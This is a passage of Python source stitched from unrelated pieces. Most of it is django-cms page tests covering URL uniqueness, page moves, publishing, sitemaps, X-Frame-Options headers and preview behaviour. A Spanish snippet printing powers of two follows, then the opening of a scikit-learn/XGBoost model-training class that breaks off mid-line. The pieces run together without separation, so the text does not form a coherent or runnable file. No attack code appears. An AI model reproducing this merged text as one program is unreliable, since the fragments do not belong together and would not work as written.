= create_page('test page 1_2', 'nav_playground.html', 'en', published=True, parent=page1, slug="bar") # Direct children of home has different slug so it's ok. self.assertTrue(validate_url_uniqueness( site, path=page1_1.get_path('en'), language='en', exclude_page=page1_1, )) self.assertTrue(validate_url_uniqueness( site, path=page1_2.get_path('en'), language='en', exclude_page=page1_2, )) # children of page1_1 has the same slug -> you lose! 
self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_1_1.get_path('en'), language='en', exclude_page=page1_1_1, ) self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_1_2.get_path('en'), language='en', exclude_page=page1_1_2, ) def test_details_view(self): """ Test the details view """ superuser = self.get_superuser() self.assertEqual(Page.objects.all().count(), 0) with self.login_user_context(superuser): page = self.create_homepage('test page 1', "nav_playground.html", "en") page.publish('en') response = self.client.get(self.get_pages_root()) self.assertEqual(response.status_code, 200) self.assertTrue(page.publish('en')) page2 = create_page("test page 2", "nav_playground.html", "en", parent=page, published=True) homepage = Page.objects.get_home() self.assertTrue(homepage.get_slug(), 'test-page-1') self.assertEqual(page2.get_absolute_url(), '/en/test-page-2/') response = self.client.get(page2.get_absolute_url()) self.assertEqual(response.status_code, 200) def test_public_exceptions(self): page_a = create_page("page_a", "nav_playground.html", "en", published=True) page_b = create_page("page_b", "nav_playground.html", "en") page = page_a.publisher_public self.assertRaises(PublicIsUnmodifiable, page.copy_with_descendants, page_b, 'last-child') self.assertRaises(PublicIsUnmodifiable, page.unpublish, 'en') self.assertRaises(PublicIsUnmodifiable, page.revert_to_live, 'en') self.assertRaises(PublicIsUnmodifiable, page.publish, 'en') self.assertTrue(page.get_draft_object().publisher_is_draft) self.assertRaises(PublicVersionNeeded, page_b.revert_to_live, 'en') def test_move_page_regression_left_to_right_5752(self): # ref: https://github.com/divio/django-cms/issues/5752 # Tests tree integrity when moving sibling pages from left # to right under the same parent. home = create_page("Home", "nav_playground.html", "en", published=True) alpha = create_page( "Alpha", "nav_playground.html", "en", published=True, parent=home, ) beta = create_page( "Beta", "nav_playground.html", "en", published=True, parent=home, ) beta.move_page(alpha.node, position='left') # Draft self.assertEqual(home.node.path, '0001') self.assertEqual(beta.node.path, '00010001') self.assertEqual(alpha.node.path, '00010002') def test_move_page_regression_right_to_left_5752(self): # ref: https://github.com/divio/django-cms/issues/5752 # Tests tree integrity when moving sibling pages from right # to left under the same parent. 
home = create_page("Home", "nav_playground.html", "en", published=True) alpha = create_page( "Alpha", "nav_playground.html", "en", published=True, parent=home, ) beta = create_page( "Beta", "nav_playground.html", "en", published=True, parent=home, ) beta.move_page(alpha.node, position='left') alpha.refresh_from_db() beta.refresh_from_db() # Draft self.assertEqual(home.node.path, '0001') self.assertEqual(beta.node.path, '00010001') self.assertEqual(alpha.node.path, '00010002') def test_move_page_regression_5640(self): # ref: https://github.com/divio/django-cms/issues/5640 alpha = create_page("Alpha", "nav_playground.html", "en", published=True) beta = create_page("Beta", "nav_playground.html", "en", published=False) alpha.move_page(beta.node, position='right') self.assertEqual(beta.node.path, '0002') self.assertEqual(alpha.node.path, '0003') def test_move_page_regression_nested_5640(self): # ref: https://github.com/divio/django-cms/issues/5640 alpha = create_page("Alpha", "nav_playground.html", "en", published=True) beta = create_page("Beta", "nav_playground.html", "en", published=False) gamma = create_page("Gamma", "nav_playground.html", "en", published=False) delta = create_page("Delta", "nav_playground.html", "en", published=True) theta = create_page("Theta", "nav_playground.html", "en", published=True) beta.move_page(alpha.node, position='last-child') gamma.move_page(beta.reload().node, position='last-child') delta.move_page(gamma.reload().node, position='last-child') theta.move_page(delta.reload().node, position='last-child') tree = [ (alpha, '0001'), (beta, '00010001'), (gamma, '000100010001'), (delta, '0001000100010001'), (theta, '00010001000100010001'), ] for page, path in tree: self.assertEqual(page.reload().node.path, path) def test_move_page_regression_5643(self): # ref: https://github.com/divio/django-cms/issues/5643 alpha = create_page("Alpha", "nav_playground.html", "en", published=True) beta = create_page("Beta", "nav_playground.html", "en", published=False) gamma = create_page("Gamma", "nav_playground.html", "en", published=False) delta = create_page("Delta", "nav_playground.html", "en", published=True) theta = create_page("Theta", "nav_playground.html", "en", published=True) beta.move_page(alpha.node, position='last-child') gamma.move_page(beta.node, position='last-child') delta.move_page(gamma.node, position='last-child') theta.move_page(delta.node, position='last-child') self.assertPublished(alpha.reload()) self.assertNeverPublished(beta.reload()) self.assertNeverPublished(gamma.reload()) self.assertPending(delta.reload()) self.assertPending(theta.reload()) def test_publish_page_regression_5642(self): # ref: https://github.com/divio/django-cms/issues/5642 alpha = create_page("Alpha", "nav_playground.html", "en", published=True) beta = create_page("Beta", "nav_playground.html", "en", published=False) gamma = create_page("Gamma", "nav_playground.html", "en", published=False) delta = create_page("Delta", "nav_playground.html", "en", published=True) theta = create_page("Theta", "nav_playground.html", "en", published=True) beta.move_page(alpha.node, position='last-child') gamma.move_page(beta.reload().node, position='last-child') delta.move_page(gamma.reload().node, position='last-child') theta.move_page(delta.reload().node, position='last-child') beta.reload().publish('en') # The delta and theta pages should remain pending publication # because gamma is still unpublished self.assertPublished(beta.reload()) self.assertNeverPublished(gamma.reload()) 
self.assertPending(delta.reload()) self.assertPending(theta.reload()) gamma.reload().publish('en') self.assertPublished(gamma.reload()) self.assertPublished(delta.reload()) self.assertPublished(theta.reload()) def test_publish_page_regression_6188(self): # ref: https://github.com/divio/django-cms/issues/6188 page = create_page("en-page", "nav_playground.html", "en", published=False) create_title('de', 'de-page', page) create_title('fr', 'fr-page', page) # Publishing the en language should set "en" as the only language # on the public version of the page. page.publish("en") self.assertListEqual(sorted(page.publisher_public.get_languages()), ['en']) page.publish("de") # Now there should be "en" and "de" on the public page self.assertSequenceEqual(sorted(page.publisher_public.get_languages()), ['de', 'en']) page.publish("fr") # Now there should be "en", "de" and "fr" on the public page self.assertSequenceEqual(sorted(page.publisher_public.get_languages()), ['de', 'en', 'fr']) def test_move_page_inherit(self): parent = create_page("Parent", 'col_three.html', "en") child = create_page("Child", constants.TEMPLATE_INHERITANCE_MAGIC, "en", parent=parent) self.assertEqual(child.get_template(), parent.get_template()) child.move_page(parent.node, 'left') child = Page.objects.get(pk=child.pk) self.assertEqual(child.get_template(), parent.get_template()) def test_add_placeholder(self): # create page page = create_page("Add Placeholder", "nav_playground.html", "en", position="last-child", published=True, in_navigation=True) page.template = 'add_placeholder.html' page.save() page.publish('en') url = page.get_absolute_url() response = self.client.get(url) self.assertEqual(200, response.status_code) path = os.path.join(settings.TEMPLATES[0]['DIRS'][0], 'add_placeholder.html') with open(path, 'r') as fobj: old = fobj.read() try: new = old.replace( '', '{% placeholder second_placeholder %}' ) with open(path, 'w') as fobj: fobj.write(new) response = self.client.get(url) self.assertEqual(200, response.status_code) finally: with open(path, 'w') as fobj: fobj.write(old) def test_sitemap_login_required_pages(self): """ Test that CMSSitemap object contains only published,public (login_required=False) pages """ create_page("page", "nav_playground.html", "en", login_required=True, published=True, in_navigation=True) self.assertEqual(CMSSitemap().items().count(), 0) def test_sitemap_includes_last_modification_date(self): one_day_ago = tz_now() - datetime.timedelta(days=1) page = create_page("page", "nav_playground.html", "en", published=True, publication_date=one_day_ago) page.creation_date = one_day_ago page.save() page.publish('en') sitemap = CMSSitemap() self.assertEqual(sitemap.items().count(), 1) actual_last_modification_time = sitemap.lastmod(sitemap.items()[0]) self.assertTrue(actual_last_modification_time > one_day_ago) def test_sitemap_uses_publication_date_when_later_than_modification(self): now = tz_now() now -= datetime.timedelta(microseconds=now.microsecond) one_day_ago = now - datetime.timedelta(days=1) page = create_page("page", "nav_playground.html", "en", published=True, publication_date=now) title = page.get_title_obj('en') page.creation_date = one_day_ago page.changed_date = one_day_ago sitemap = CMSSitemap() actual_last_modification_time = sitemap.lastmod(title) self.assertEqual(actual_last_modification_time.date(), now.date()) def test_templates(self): """ Test the inheritance magic for templates """ parent = create_page("parent", "nav_playground.html", "en") child = create_page("child", 
"nav_playground.html", "en", parent=parent) grand_child = create_page("grand child", "nav_playground.html", "en", parent=child) child2 = create_page("child2", "col_two.html", "en", parent=parent) grand_child2 = create_page("grand child2", "nav_playground.html", "en", parent=child2) child.template = constants.TEMPLATE_INHERITANCE_MAGIC grand_child.template = constants.TEMPLATE_INHERITANCE_MAGIC child.save() grand_child.save() grand_child2.template = constants.TEMPLATE_INHERITANCE_MAGIC grand_child2.save() self.assertFalse(hasattr(grand_child, '_template_cache')) with self.assertNumQueries(1): self.assertEqual(child.template, constants.TEMPLATE_INHERITANCE_MAGIC) self.assertEqual(parent.get_template_name(), grand_child.get_template_name()) # test template cache with self.assertNumQueries(0): grand_child.get_template() self.assertFalse(hasattr(grand_child2, '_template_cache')) with self.assertNumQueries(1): self.assertEqual(child2.template, 'col_two.html') self.assertEqual(child2.get_template_name(), grand_child2.get_template_name()) # test template cache with self.assertNumQueries(0): grand_child2.get_template() parent.template = constants.TEMPLATE_INHERITANCE_MAGIC parent.save() self.assertEqual(parent.template, constants.TEMPLATE_INHERITANCE_MAGIC) self.assertEqual(parent.get_template(), get_cms_setting('TEMPLATES')[0][0]) self.assertEqual(parent.get_template_name(), get_cms_setting('TEMPLATES')[0][1]) def test_delete_with_plugins(self): """ Check that plugins and placeholders get correctly deleted when we delete a page! """ Text = self.get_plugin_model('TextPlugin') home = create_page("home", "nav_playground.html", "en") page = create_page("page", "nav_playground.html", "en") page.rescan_placeholders() # create placeholders placeholder = page.placeholders.all()[0] plugin_base = CMSPlugin( plugin_type='TextPlugin', placeholder=placeholder, position=1, language=settings.LANGUAGES[0][0] ) plugin_base = plugin_base.add_root(instance=plugin_base) plugin = Text(body='') plugin_base.set_base_attr(plugin) plugin.save() self.assertEqual(CMSPlugin.objects.count(), 1) self.assertEqual(Text.objects.count(), 1) self.assertTrue(Placeholder.objects.count() > 2) superuser = self.get_superuser() home_pl_count = home.get_placeholders().count() page_pl_count = page.get_placeholders().count() expected_pl_count = Placeholder.objects.count() - (home_pl_count + page_pl_count) with self.login_user_context(superuser): # Delete page self.client.post(self.get_admin_url(Page, 'delete', page.pk), {'post': 'yes'}) with self.login_user_context(superuser): # Delete home page self.client.post(self.get_admin_url(Page, 'delete', home.pk), {'post': 'yes'}) self.assertEqual(CMSPlugin.objects.count(), 0) self.assertEqual(Text.objects.count(), 0) self.assertEqual(Placeholder.objects.exclude(slot='clipboard').count(), expected_pl_count) self.assertEqual(Page.objects.count(), 0) def test_get_page_from_request_nopage(self): request = self.get_request('/') page = get_page_from_request(request) self.assertEqual(page, None) def test_get_page_from_request_with_page_404(self): page = create_page("page", "nav_playground.html", "en", published=True) page.publish('en') request = self.get_request('/does-not-exist/') found_page = get_page_from_request(request) self.assertEqual(found_page, None) def test_get_page_without_final_slash(self): root = create_page("root", "nav_playground.html", "en", slug="root", published=True) page = create_page("page", "nav_playground.html", "en", slug="page", published=True, parent=root) root.publish('en') 
page = page.reload() page.publish('en') request = self.get_request('/en/root/page') found_page = get_page_from_request(request) self.assertIsNotNone(found_page) self.assertFalse(found_page.publisher_is_draft) def test_ancestor_expired(self): yesterday = tz_now() - datetime.timedelta(days=1) tomorrow = tz_now() + datetime.timedelta(days=1) root = create_page("root", "nav_playground.html", "en", slug="root", published=True) page_past = create_page("past", "nav_playground.html", "en", slug="past", publication_end_date=yesterday, published=True, parent=root) page_test = create_page("test", "nav_playground.html", "en", slug="test", published=True, parent=page_past) page_future = create_page("future", "nav_playground.html", "en", slug="future", publication_date=tomorrow, published=True, parent=root) page_test_2 = create_page("test", "nav_playground.html", "en", slug="test", published=True, parent=page_future) request = self.get_request(page_test.get_absolute_url()) page = get_page_from_request(request) self.assertEqual(page, None) request = self.get_request(page_test_2.get_absolute_url()) page = get_page_from_request(request) self.assertEqual(page, None) def test_page_already_expired(self): """ Test that a page which has a end date in the past gives a 404, not a 500. """ yesterday = tz_now() - datetime.timedelta(days=1) with self.settings(CMS_PERMISSION=False): page = create_page('page', 'nav_playground.html', 'en', publication_end_date=yesterday, published=True) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.status_code, 404) def test_page_urls(self): page1 = self.create_homepage('test page 1', 'nav_playground.html', 'en', published=True) page2 = create_page('test page 2', 'nav_playground.html', 'en', published=True, parent=page1) page3 = create_page('test page 3', 'nav_playground.html', 'en', published=True, parent=page2) page4 = create_page('test page 4', 'nav_playground.html', 'en', published=True) page5 = create_page('test page 5', 'nav_playground.html', 'en', published=True, parent=page4) page1 = page1.reload() page2 = page2.reload() page3 = page3.reload() page4 = page4.reload() page5 = page5.reload() self.assertEqual(page3.node.parent_id, page2.node.pk) self.assertEqual(page2.node.parent_id, page1.node.pk) self.assertEqual(page5.node.parent_id, page4.node.pk) self.assertEqual(page1.get_absolute_url(), self.get_pages_root() + '') self.assertEqual(page2.get_absolute_url(), self.get_pages_root() + 'test-page-2/') self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'test-page-2/test-page-3/') self.assertEqual(page4.get_absolute_url(), self.get_pages_root() + 'test-page-4/') self.assertEqual(page5.get_absolute_url(), self.get_pages_root() + 'test-page-4/test-page-5/') page3 = self.move_page(page3, page1) self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'test-page-3/') page3 = page3.reload() page2 = page2.reload() page5 = page5.reload() page5 = self.move_page(page5, page2) self.assertEqual(page5.get_absolute_url(), self.get_pages_root() + 'test-page-2/test-page-5/') page3 = page3.reload() page4 = page4.reload() page3 = self.move_page(page3, page4) self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'test-page-4/test-page-3/') def test_page_and_title_repr(self): non_saved_page = Page() self.assertIsNone(non_saved_page.pk) self.assertIn('id=None', repr(non_saved_page)) saved_page = create_page('test saved page', 'nav_playground.html', 'en') self.assertIsNotNone(saved_page.pk) self.assertIn('id={}'.format(saved_page.pk), 
repr(saved_page)) self.assertIn('is_draft={}'.format(saved_page.publisher_is_draft), repr(saved_page)) non_saved_title = Title() self.assertIsNone(non_saved_title.pk) self.assertIn('id=None', repr(non_saved_title)) saved_title = saved_page.get_title_obj() self.assertIsNotNone(saved_title.pk) self.assertIn('id={}'.format(saved_title.pk), repr(saved_title)) self.assertIn('is_draft={}'.format(saved_title.publisher_is_draft), repr(saved_title)) def test_page_overwrite_urls(self): page1 = self.create_homepage('test page 1', 'nav_playground.html', 'en', published=True) page2 = create_page('test page 2', 'nav_playground.html', 'en', published=True, parent=page1) page3 = create_page('test page 3', 'nav_playground.html', 'en', published=True, parent=page2, overwrite_url='i-want-another-url') superuser = self.get_superuser() self.assertEqual(page2.get_absolute_url(), self.get_pages_root() + 'test-page-2/') self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'i-want-another-url/') endpoint = self.get_admin_url(Page, 'change', page2.pk) with self.login_user_context(superuser): response = self.client.post(endpoint, {'title': 'test page 2', 'slug': 'page-test-2'}) self.assertRedirects(response, self.get_admin_url(Page, 'changelist')) page2 = Page.objects.get(pk=page2.pk) page3 = Page.objects.get(pk=page3.pk) self.assertEqual(page2.get_absolute_url(), self.get_pages_root() + 'page-test-2/') self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'i-want-another-url/') # tests a bug found in 2.2 where saving an ancestor page # wiped out the overwrite_url for child pages page2.save() self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'i-want-another-url/') def test_slug_url_overwrite_clash(self): """ Tests if a URL-Override clashes with a normal page url """ site = get_current_site() with self.settings(CMS_PERMISSION=False): create_page('home', 'nav_playground.html', 'en', published=True) bar = create_page('bar', 'nav_playground.html', 'en', published=False) foo = create_page('foo', 'nav_playground.html', 'en', published=True) # Tests to assure is_valid_url is ok on plain pages self.assertTrue(validate_url_uniqueness( site, path=bar.get_path('en'), language='en', exclude_page=bar, )) self.assertTrue(validate_url_uniqueness( site, path=foo.get_path('en'), language='en', exclude_page=foo, )) # Set url_overwrite for page foo title = foo.get_title_obj(language='en') title.has_url_overwrite = True title.path = 'bar' title.save() foo.publish('en') self.assertRaises( ValidationError, validate_url_uniqueness, site, path=bar.get_path('en'), language='en', exclude_page=bar, ) def test_valid_url_multisite(self): site1 = Site.objects.get_current() site3 = Site.objects.create(domain="sample3.com", name="sample3.com") home = create_page('home', 'nav_playground.html', 'de', published=True, site=site1) bar = create_page('bar', 'nav_playground.html', 'de', slug="bar", published=True, parent=home, site=site1) home_s3 = create_page('home', 'nav_playground.html', 'de', published=True, site=site3) bar_s3 = create_page('bar', 'nav_playground.html', 'de', slug="bar", published=True, parent=home_s3, site=site3) self.assertTrue(validate_url_uniqueness( site1, path=bar.get_path('de'), language='de', exclude_page=bar, )) self.assertTrue(validate_url_uniqueness( site3, path=bar_s3.get_path('de'), language='de', exclude_page=bar_s3, )) def test_home_slug_not_accessible(self): with self.settings(CMS_PERMISSION=False): page = self.create_homepage('page', 'nav_playground.html', 'en', 
published=True) self.assertEqual(page.get_absolute_url('en'), '/en/') resp = self.client.get('/en/') self.assertEqual(resp.status_code, HttpResponse.status_code) resp = self.client.get('/en/page/') self.assertEqual(resp.status_code, HttpResponseNotFound.status_code) def test_plugin_loading_queries(self): with self.settings( CMS_TEMPLATES=(('placeholder_tests/base.html', 'tpl'), ), ): page = create_page('home', 'placeholder_tests/base.html', 'en', published=True, slug='home') placeholders = list(page.placeholders.all()) for i, placeholder in enumerate(placeholders): for j in range(5): add_plugin(placeholder, 'TextPlugin', 'en', body='text-%d-%d' % (i, j)) add_plugin(placeholder, 'LinkPlugin', 'en', name='link-%d-%d' % (i, j)) # trigger the apphook query so that it doesn't get in our way reverse('pages-root') # trigger the get_languages query so it doesn't get in our way context = self.get_context(page=page) context['request'].current_page.get_languages() renderer = self.get_content_renderer(context['request']) with self.assertNumQueries(4): for i, placeholder in enumerate(placeholders): content = renderer.render_page_placeholder( placeholder.slot, context, inherit=False, ) for j in range(5): self.assertIn('text-%d-%d' % (i, j), content) self.assertIn('link-%d-%d' % (i, j), content) def test_xframe_options_allow(self): """Test that no X-Frame-Options is set when page's xframe_options is set to allow""" page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_ALLOW ) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) def test_xframe_options_sameorigin(self): """Test that X-Frame-Options is 'SAMEORIGIN' when xframe_options is set to origin""" page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_SAMEORIGIN ) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'SAMEORIGIN') def test_xframe_options_deny(self): """Test that X-Frame-Options is 'DENY' when xframe_options is set to deny""" page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_DENY ) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'DENY') def test_xframe_options_inherit_with_parent(self): """Test that X-Frame-Options is set to parent page's setting when inherit is set""" parent = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_DENY ) child1 = create_page( title='subpage', template='nav_playground.html', language='en', published=True, slug='subpage', parent=parent, xframe_options=Page.X_FRAME_OPTIONS_INHERIT ) child2 = create_page( title='subpage', template='nav_playground.html', language='en', published=True, slug='subpage', parent=child1, xframe_options=Page.X_FRAME_OPTIONS_ALLOW ) child3 = create_page( title='subpage', template='nav_playground.html', language='en', published=True, slug='subpage', parent=child2, xframe_options=Page.X_FRAME_OPTIONS_INHERIT ) resp = self.client.get(parent.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'DENY') resp = self.client.get(child1.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'DENY') resp = self.client.get(child2.get_absolute_url('en')) 
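# child2 explicitly allows framing, so no X-Frame-Options header is expected
# for it; child3 is set to INHERIT and therefore follows child2's setting.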
self.assertEqual(resp.get('X-Frame-Options'), None) resp = self.client.get(child3.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) def test_top_level_page_inherited_xframe_options_are_applied(self): MIDDLEWARE = settings.MIDDLEWARE + ['django.middleware.clickjacking.XFrameOptionsMiddleware'] with self.settings(MIDDLEWARE=MIDDLEWARE): page = create_page('test page 1', 'nav_playground.html', 'en', published=True) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), 'SAMEORIGIN') def test_xframe_options_with_cms_page_cache_and_clickjacking_middleware(self): # Refs: 6346 override = { 'MIDDLEWARE': settings.MIDDLEWARE + [ 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] } override['CMS_PAGE_CACHE'] = True with self.settings(**override): page = create_page( 'test page 1', 'nav_playground.html', 'en', published=True, xframe_options=Page.X_FRAME_OPTIONS_ALLOW, ) # Normal response from render_page resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) # Response from page cache resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.get('X-Frame-Options'), None) def test_page_used_on_request(self): """ The rendered page changes depending on request and user permissions. """ superuser = self.get_superuser() staff_with_no_permissions = self.get_staff_user_with_no_permissions() draft_text = '

text only in draft' public_text = 'text in draft & live

' cms_page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_DENY ) placeholder = cms_page.placeholders.all()[0] add_plugin(cms_page.placeholders.all()[0], 'TextPlugin', 'en', body=public_text) cms_page.publish('en') add_plugin(placeholder, 'TextPlugin', 'en', body=draft_text) endpoint = cms_page.get_absolute_url('en') with self.login_user_context(superuser): # staff user with change permissions # draft page is always used resp = self.client.get(endpoint) self.assertContains(resp, public_text) self.assertContains(resp, draft_text) with self.login_user_context(superuser): # staff user with change permissions # draft page is used regardless of edit resp = self.client.get(endpoint + '?edit_off') self.assertContains(resp, public_text) self.assertContains(resp, draft_text) with self.login_user_context(superuser): # staff user with change permissions # draft page is used regardless of edit resp = self.client.get(endpoint + '?toolbar_off') self.assertContains(resp, public_text) self.assertContains(resp, draft_text) with self.login_user_context(superuser): # staff user with change permissions # public page is used because of explicit ?preview resp = self.client.get(endpoint + '?preview') self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) with self.login_user_context(superuser): # staff user with change permissions # public page is used because of preview disables edit resp = self.client.get(endpoint + '?preview&edit') self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) with self.login_user_context(staff_with_no_permissions): # staff user with no change permissions # public page is always used resp = self.client.get(endpoint) self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) def test_page_preview_persists(self): """ Page preview persists in the user session to allow users to navigate the site in public mode. """ superuser = self.get_superuser() draft_text = '

text only in draft' public_text = 'text in draft & live

' cms_page = create_page( title='home', template='nav_playground.html', language='en', published=True, slug='home', xframe_options=Page.X_FRAME_OPTIONS_DENY ) placeholder = cms_page.placeholders.all()[0] add_plugin(cms_page.placeholders.all()[0], 'TextPlugin', 'en', body=public_text) cms_page.publish('en') add_plugin(placeholder, 'TextPlugin', 'en', body=draft_text) endpoint = cms_page.get_absolute_url('en') with self.login_user_context(superuser): # staff user with change permissions # public page is used because of explicit ?preview resp = self.client.get(endpoint + '?preview') self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) resp = self.client.get(endpoint) self.assertContains(resp, public_text) self.assertNotContains(resp, draft_text) def test_translated_subpage_title_path_regeneration(self): """ When a child page is created with multiple translations before parent translation, child title translation path should be regenerated to take into account parent path. This test enforces the issues found in: https://github.com/django-cms/django-cms/issues/6622, where the slug was not regenerated. """ parent = create_page('en-parent', "nav_playground.html", 'en', slug = 'en-parent', published=True) child = create_page('en-child', "nav_playground.html", 'en', slug = 'en-child', parent=parent, published=True) create_title('de', 'de-child', child, slug='de-child') # Parent 'de' title created after child translation create_title('de', 'de-parent', parent, slug='de-parent') parent._update_title_path_recursive('de', slug='de-parent') parent.clear_cache(menu=True) parent.publish('de') child.publish('de') response = self.client.get('/de/de-parent/de-child/') self.assertEqual(response.status_code, 200) def test_subpage_title_path_regeneration_after_parent_slug_change(self): """ When a parent page slug changes, the child title path should be regenerated. This test enforces the issues found in: https://github.com/django-cms/django-cms/issues/6622, where the slug was not regenerated. 
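In this test the parent slug changes from 'badfoo' to 'foo', after which the
child must be reachable at /en/foo/bar/.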
""" parent = create_page('BadFoo', "nav_playground.html", 'en', slug = 'badfoo', published=True) child = create_page('Bar', "nav_playground.html", 'en', slug = 'bar', parent=parent, published=True) title = parent.get_title_obj(language='en', fallback=False) title.title='Foo' title.save() parent._update_title_path_recursive('en', slug='foo') parent.clear_cache(menu=True) parent.publish('en') child.publish('en') response = self.client.get('/en/foo/bar/') self.assertEqual(response.status_code, 200) class PageTreeTests(CMSTestCase): def test_rename_node(self): superuser = self.get_superuser() home = create_page('grandpa', 'nav_playground.html', 'en', slug='home', published=True) home.publish('en') parent = create_page('parent', 'nav_playground.html', 'en', slug='parent', published=True) parent.publish('en') child = create_page('child', 'nav_playground.html', 'en', slug='child', published=True, parent=parent) child.publish('en') endpoint = self.get_admin_url(Page, 'change', parent.pk) with self.login_user_context(superuser): response = self.client.post(endpoint, {'title': 'parent', 'slug': 'father'}) self.assertRedirects(response, self.get_admin_url(Page, 'changelist')) parent = Page.objects.get(pk=parent.pk) parent.publish('en') child = Page.objects.get(pk=child.pk) self.assertEqual(child.get_absolute_url(language='en'), '/en/father/child/') self.assertEqual(child.publisher_public.get_absolute_url(language='en'), '/en/father/child/') def test_rename_node_alters_descendants(self): superuser = self.get_superuser() create_page('grandpa', 'nav_playground.html', 'en', slug='home', published=True) parent = create_page('parent', 'nav_playground.html', 'en', slug='parent', published=True) child = create_page('child', 'nav_playground.html', 'en', slug='child', published=True, parent=parent) grandchild_1 = create_page('grandchild-1', 'nav_playground.html', 'en', slug='grandchild-1', published=True, parent=child) grandchild_2 = create_page('grandchild-2', 'nav_playground.html', 'en', slug='grandchild-2', published=True, parent=child.reload()) grandchild_3 = create_page('grandchild-3', 'nav_playground.html', 'en', slug='grandchild-3', published=True, parent=child.reload()) endpoint = self.get_admin_url(Page, 'change', parent.pk) with self.login_user_context(superuser): response = self.client.post(endpoint, {'title': 'parent', 'slug': 'father'}) self.assertRedirects(response, self.get_admin_url(Page, 'changelist')) # Draft pages self.assertEqual(grandchild_1.get_absolute_url(language='en'), '/en/father/child/grandchild-1/') self.assertEqual(grandchild_2.get_absolute_url(language='en'), '/en/father/child/grandchild-2/') self.assertEqual(grandchild_3.get_absolute_url(language='en'), '/en/father/child/grandchild-3/') parent.reload().publish('en') # Public pages self.assertEqual(grandchild_1.publisher_public.get_absolute_url(language='en'), '/en/father/child/grandchild-1/') self.assertEqual(grandchild_2.publisher_public.get_absolute_url(language='en'), '/en/father/child/grandchild-2/') self.assertEqual(grandchild_3.publisher_public.get_absolute_url(language='en'), '/en/father/child/grandchild-3/') def test_move_node(self): home = create_page('grandpa', 'nav_playground.html', 'en', slug='home', published=True) home.publish('en') parent = create_page('parent', 'nav_playground.html', 'en', slug='parent', published=True) parent.publish('en') child = create_page('child', 'nav_playground.html', 'en', slug='child', published=True, parent=home) child.publish('en') child.move_page(parent.node) child = child.reload() 
child.publish('en') child.reload() self.assertEqual(child.get_absolute_url(language='en'), '/en/parent/child/') self.assertEqual(child.publisher_public.get_absolute_url(language='en'), '/en/parent/child/') contador = 0 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 1 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 2 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 3 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 4 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 5 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 6 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 7 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) contador = 8 print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador)) MauroLuzzatto/algorithmic-explanations0 # -*- coding: utf-8 -*- """ Created on Tue Nov 24 21:29:13 2020 @author: mauro """ import datetime import json import os import pickle import random import matplotlib.pyplot as plt # type: ignore import pandas as pd # type: ignore import sklearn # type: ignore from LoggerClass import LoggerClass from sklearn.base import is_classifier, is_regressor # type: ignore from sklearn.datasets import load_diabetes # type: ignore from sklearn.metrics import f1_score # type: ignore from sklearn.metrics import ( accuracy_score, mean_absolute_error, mean_absolute_percentage_error, mean_squared_error, precision_score, r2_score, ) from sklearn.model_selection import RandomizedSearchCV # type: ignore from sklearn.model_selection import train_test_split # type: ignore from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from xgboost import XGBRegressor # type: ignore from src.model.config import path_base from src.model.utils import create_folder, get_dataset class ModelClass(object): """ This class provides the funktionality to train a model using a random grid search and evaluate the results """ def __init__( self, estimator: sklearn.base.BaseEstimator, X: pd.DataFrame, y: pd.DataFrame, path_model: str, folder: str = None, ) -> None: """ Initialize the class and setup the logger and define the paths to save the results to Args: estimator (sklearn.BaseEstimator): [description] X (pd.DataFrame): [description] y (pd.DataFrame): [description] path_model (str): [description] folder (str): add a folder extension in the save folder """ self.X = X.values self.y = y.values self.column_names = list(X) self.path_model = path_model self.estimator = estimator self.save_name = estimator.__class__.__name__ self.folder = folder self.set_paths() Logger = LoggerClass() self.logger = Logger(self.path_save, stage="training") self.get_train_test_split() def set_paths(self): """ Define the neceneeded paths for saving the results """ self.time_stamp = datetime.datetime.now().strftime("%Y-%m-%d--%H-%M-%S") if self.folder: folder_name = f"{self.time_stamp} - {self.folder}" else: folder_name = self.time_stamp self.path_model = create_folder(os.path.join(self.path_model, folder_name)) self.path_save = 